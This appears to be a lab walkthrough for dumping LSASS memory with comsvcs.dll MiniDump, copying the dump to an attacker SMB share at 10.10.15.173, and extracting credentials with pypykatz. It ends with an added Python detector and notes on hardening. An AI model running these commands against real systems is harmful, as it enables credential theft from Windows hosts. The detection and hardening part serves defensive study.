Attacking LSASS

June 05, 2024

First we get the process ID of lsass, which here is 660:

Get-Process lsass

Then create an lsass dump with this command, passing the PID reported by Get-Process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Now we will move the file from the victim machine to the attacker machine.

First we have to start an SMB server. Create a directory that the file will be transferred into:

mkdir TmpShare
sudo impacket-smbserver -smb2support LsassData TmpShare
move lsass.dmp \\10.10.15.173\LsassData

Now change into the TmpShare folder.

We can see here that the file has been transferred with the same number of bytes:

cd TmpShare
ls -la

Actually, the PowerShell code didn't work for me.

So I just used the Task Manager method.

Once we have set up our listener (the SMB server), we will receive it:

sudo impacket-smbserver -smb2support LsassData TmpShare

Now move the DMP file to our attacker machine:

move C:\Users\HTB-ST~1\AppData\Local\Temp\lsass.DMP \\10.10.15.173\LsassData

Now we have the DMP file.

Just run pypykatz, which is a Python implementation of mimikatz that runs on Linux:

pypykatz lsa minidump lsass.DMP
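The whole chain above leaves a recognisable trail on the victim host: a process-create event for rundll32 with comsvcs.dll and MiniDump on the command line, a process-access event against lsass.exe with a read-memory access right, a file-create event for an lsass*.dmp file, and a command that moves a .dmp file to a UNC share. The following is an added example, not code from the original post: a small Python detector that applies those four rules to constructed Sysmon-style records (field names mirror Sysmon Event IDs 1, 10 and 11; the records themselves, including the Taskmgr access mask and the svchost benign event, are made up for the example). On the prevention side, LSA protection (RunAsPPL) and Credential Guard both stop the plain MiniDump approach shown on this page from yielding usable credentials.

```python
"""Added example (not from the original post): flag the LSASS-dump pattern
described above in constructed Sysmon-style log records."""
import re
from dataclasses import dataclass

# PROCESS_VM_READ is the access right a process needs to read LSASS memory.
PROCESS_VM_READ = 0x0010

# Constructed sample records in a simplified "key=value|key=value" form.
# Not real telemetry; field names mirror Sysmon Event 1 (process create),
# Event 10 (process access) and Event 11 (file create).
SAMPLE_LOGS = [
    "EventID=1|Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full",
    "EventID=10|SourceImage=C:\\Windows\\System32\\rundll32.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1FFFFF",
    "EventID=10|SourceImage=C:\\Windows\\System32\\Taskmgr.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1410",
    "EventID=11|Image=C:\\Windows\\System32\\Taskmgr.exe|TargetFilename=C:\\Users\\HTB-ST~1\\AppData\\Local\\Temp\\lsass.DMP",
    "EventID=1|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=move C:\\Users\\HTB-ST~1\\AppData\\Local\\Temp\\lsass.DMP \\\\10.10.15.173\\LsassData",
    # Benign: a query-limited-information handle (0x1000) carries no VM_READ bit.
    "EventID=10|SourceImage=C:\\Windows\\System32\\svchost.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1000",
    # Benign: rundll32 used for something unrelated to comsvcs.dll.
    "EventID=1|Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32 shell32.dll,Control_RunDLL",
]


@dataclass
class Finding:
    rule: str
    line_no: int
    detail: str


def parse_event(line: str) -> dict:
    """Split one constructed 'key=value|key=value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(fields: dict, line_no: int) -> list:
    """Apply the four rules to a single parsed record."""
    findings = []
    event = fields.get("EventID")
    cmd = fields.get("CommandLine", "").lower()
    if event == "1":
        # comsvcs.dll exports MiniDump; a process create invoking it is suspicious.
        if "comsvcs.dll" in cmd and "minidump" in cmd:
            findings.append(Finding("comsvcs_minidump", line_no, fields["CommandLine"]))
        # A .dmp file referenced together with a UNC path (\\host\share).
        if ".dmp" in cmd and re.search(r"\\\\[^\\\s]+\\[^\\\s]+", cmd):
            findings.append(Finding("dump_to_network_share", line_no, fields["CommandLine"]))
    elif event == "10" and _basename(fields.get("TargetImage", "")) == "lsass.exe":
        # GrantedAccess is a hex mask; any handle with VM_READ on lsass is worth review.
        access = int(fields.get("GrantedAccess", "0"), 16)
        if access & PROCESS_VM_READ:
            findings.append(Finding("lsass_memory_read_handle", line_no, fields.get("SourceImage", "?")))
    elif event == "11":
        name = _basename(fields.get("TargetFilename", ""))
        if name.startswith("lsass") and name.endswith(".dmp"):
            findings.append(Finding("lsass_dump_file_created", line_no, fields["TargetFilename"]))
    return findings


def scan(lines) -> list:
    """Run check_event over every record and return all findings in order."""
    findings = []
    for n, line in enumerate(lines, 1):
        findings.extend(check_event(parse_event(line), n))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

Run against the constructed records, the scan flags the first five events and leaves the svchost and shell32 rundll32 events alone. On real telemetry the process-access rule needs an allowlist of legitimate readers (antivirus and EDR agents routinely open lsass with VM_READ), which is why the finding records the source image rather than deciding on its own.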
